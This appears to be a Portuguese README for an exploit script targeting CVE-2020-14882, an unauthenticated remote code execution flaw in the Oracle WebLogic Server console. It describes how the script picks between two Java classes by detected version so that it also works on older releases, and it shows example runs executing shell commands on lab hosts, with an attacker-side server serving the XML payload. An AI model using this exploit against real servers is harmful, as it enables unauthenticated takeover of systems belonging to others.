
CVE-2020-14882
CVE-2020-14882
Vulnerabilidade no produto Oracle WebLogic Server do Oracle Fusion Middleware (componente: Console). As versões suportadas afetadas são 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 e 14.1.1.0.0. Uma vulnerabilidade facilmente explorável permite que um atacante não autenticado, com acesso à rede via HTTP, comprometa o Oracle WebLogic Server. Ataques bem-sucedidos desta vulnerabilidade podem resultar na tomada do Oracle WebLogic
Para versões do Oracle WebLogic anteriores à 12.2.1, precisamos usar a classe 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext', pois a classe 'com.tangosol.coherence.mvel2.sh.ShellSession' não está disponível. O script alterna automaticamente entre as duas classes para a execução de comandos, dependendo das versões detectadas.
Alguns dos scripts atuais disponíveis no Github para explorar o CVE-2020-14882 suportam apenas a classe 'com.tangosol.coherence.mvel2.sh.ShellSession', o que significa que os scripts falharão nas versões 10.3.6.0.0 e 12.1.3.0.0 do WebLogic.
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux